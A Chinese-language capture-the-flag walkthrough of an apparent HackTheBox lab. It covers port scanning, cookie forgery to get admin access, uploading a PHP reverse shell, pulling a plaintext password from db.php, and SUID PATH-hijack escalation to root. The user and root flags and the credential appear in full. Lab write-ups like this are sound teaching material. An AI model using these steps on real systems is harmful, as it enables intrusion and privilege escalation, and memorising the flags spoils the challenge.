目录
[1.With what kind of tool can intercept web traffic?](#1.With what kind of tool can intercept web traffic?)
[2.What is the path to the directory on the webserver that returns a login page?](#2.What is the path to the directory on the webserver that returns a login page?)
[3.What can be modified in Firefox to get access to the upload page?](#3.What can be modified in Firefox to get access to the upload page?)
[4.What is the access ID of the admin user?](#4.What is the access ID of the admin user?)
[5.On uploading a file, what directory does that file appear in on the server?](#5.On uploading a file, what directory does that file appear in on the server?)
[6.What is the file that contains the password that is shared with the robert user?](#6.What is the file that contains the password that is shared with the robert user?)
USER_FLAG:f2c74ee8db7983851ab2a96a44eb7981
[7.What executible is run with the option "-group bugtracker" to identify all files owned by the bugtracker group?](#7.What executible is run with the option "-group bugtracker" to identify all files owned by the bugtracker group?)
[8.Regardless of which user starts running the bugtracker executable, what's user privileges will use to run?](#8.Regardless of which user starts running the bugtracker executable, what's user privileges will use to run?)
[9.What SUID stands for?](#9.What SUID stands for?)
[10.What is the name of the executable being called in an insecure manner?](#10.What is the name of the executable being called in an insecure manner?)
ROOT_FLAG:af13b0bee69f8a877c3faf667f7beacf
连接至HTB服务器并开启靶机
靶机IP:10.129.215.110
分配IP:10.10.16.32
1.With what kind of tool can intercept web traffic?
这题答案是代理:proxy
考虑到Kali对靶机进行渗透更方便,可选用的流量劫持工具有BurpSuite、Yakit
2.What is the path to the directory on the webserver that returns a login page?
使用fscan对靶机进行端口扫描:
php
./fscan -nopoc -nobr -np -h {TARGET_IP}
可见开启了22、80 共2个端口,且80端口存在响应200的可访问Web网页
再使用nmap对这两个端口进行服务单独扫描:
php
nmap -sC -sV -p 22,80 {TARGET_IP}
使用浏览器打开靶机Web页面:http://10.129.215.110
再使用 FindSomething 插件找到有泄露登录的路径:/cdn-cgi/login
3.What can be modified in Firefox to get access to the upload page?
进入登录界面:**http://10.129.215.110/cdn-cgi/login**点击左下角的以访客身份登录
以访客身份登入后,点击左上角的 Account
观察到URL后面的id参数值为:2 ,并且guest的Access ID值为:2233
尝试将id值修改为:1 ,我们就获得了admin的Access ID值为:34322
这里使用Yakit,点击手动劫持开始流量劫持:
点击Uploads按钮,成功劫持到请求包,修改 cookie 中的值:
user修改为:34322 ,role修改为:admin
修改完成后,点击右上角的 提交数据 进行发包:
成功进入文件上传界面:
4.What is the access ID of the admin user?
从上文可知,通过修改cookie中的值可以访问仅管理员可访问的文件上传页面
其中user值很明显对应的是Access ID,而admin用户的Access ID:34322
5.On uploading a file, what directory does that file appear in on the server?
使用 Wappalyzer 识别该页面技术栈:
可见该页面所用脚本语言为:PHP ,接下来我们上传Kali自带的Webshell
路径:/usr/share/webshells/php/php-reverse-shell.php
我们修改该Webshell中的IP、PORT两个数据:
点击Browse选择php-reverse-shell.php,并点击Upload后抓包,同样需要对cookie的值进行修改:
上传成功后接下来需要对靶机进行目录扫描找到文件上传路径,我这里使用dirsearch:
php
dirsearch -u http://{TARGET_IP} -e php
这里扫到了 /uploads 目录,使用nc持续监听后访问目标URL成功getshell:
http://{TARGET_IP}/uploads/php-reverse-shell.php
6.What is the file that contains the password that is shared with the robert user?
使用python中的pty模块模拟伪终端tty以获取交互shell:
执行命令:
php
python3 -c 'import pty;pty.spawn("/bin/bash")'
查找所有.php后缀文件,看是否存在敏感信息泄露:
php
find / -type f -name *.php 2>/dev/null
可以看到php文件大多集中于 /var/www/html/cdn-cgi/login/ 目录下
进入目录后查看所有内容以寻找密码:
php
cd /var/www/html/cdn-cgi/login; cat * | grep -i robert
用户名:robert
密码:M3g4C0rpUs3r!
再通过grep命令查询这些字符串属于哪个文件:
php
grep -rl M3g4C0rpUs3r!
可以看到以上信息属于 db.php 文件内容
使用已获得的账户和密码对robert进行登录:
php
su robert
在**/home/robert**目录下找到了user.txt文件
USER_FLAG:f2c74ee8db7983851ab2a96a44eb7981
7.What executible is run with the option "-group bugtracker" to identify all files owned by the bugtracker group?
使用 find 命令查询属于bugtracker组的所有文件:
php
find / -group bugtracker 2>/dev/null
回显为:/usr/bin/bugtracker ,进一步查看该文件信息以及权限:
php
ls -l /usr/bin/bugtracker; file /usr/bin/bugtracker
8.Regardless of which user starts running the bugtracker executable, what's user privileges will use to run?
可见bugtracker文件设置了一个setuid 集合并且文件所有者为root
在 Linux 和类 Unix 系统中,setuid(Set User ID)是一种特殊权限标志。当可执行文件被设置 setuid 权限后,执行时会以文件所有者身份而非执行用户身份运行。它主要用于实现特定系统管理任务,如普通用户通过设置了 setuid 权限的程序(如修改密码的程序)以高权限执行特定操作,同时也可提供受限的特权访问
9.What SUID stands for?
SUIB全称为:Set owner User ID
10.What is the name of the executable being called in an insecure manner?
我们直接运行bugtracker文件:
bash
cd /usr/bin; ./bugtracker
- 可见,该文件运行后会执行命令:cat /root/reports/FILE
- 此时若将shell命名为 'cat' 加进PATH中,因为查找优先级比 cat 高所以优先执行
- 因此将以不安全的方式调用 cat ,实则通过运行bugtracker文件即可实现root提权
进入根目录下的/tmp文件夹中:
bash
cd /tmp
编写shell启动器并保存到'cat'文件中:
bash
echo '/bin/sh' > cat
为'cat'文件赋执行权限:
bash
chmod +x cat
将/tmp路径加入PATH环境变量头部以此提升'cat'文件查找优先权:
bash
export PATH=/tmp:$PATH
通过命令查看PATH环境变量,查看/tmp目录是否成功添加:
bash
echo $PATH
回到**/usr/bin/** 目录下,运行bugtracker文件:
bash
cd /usr/bin; ./bugtracker
进入/root目录,找到root.txt文件,使用more、head、tail命令查看文件内容:
bash
cd /root; ls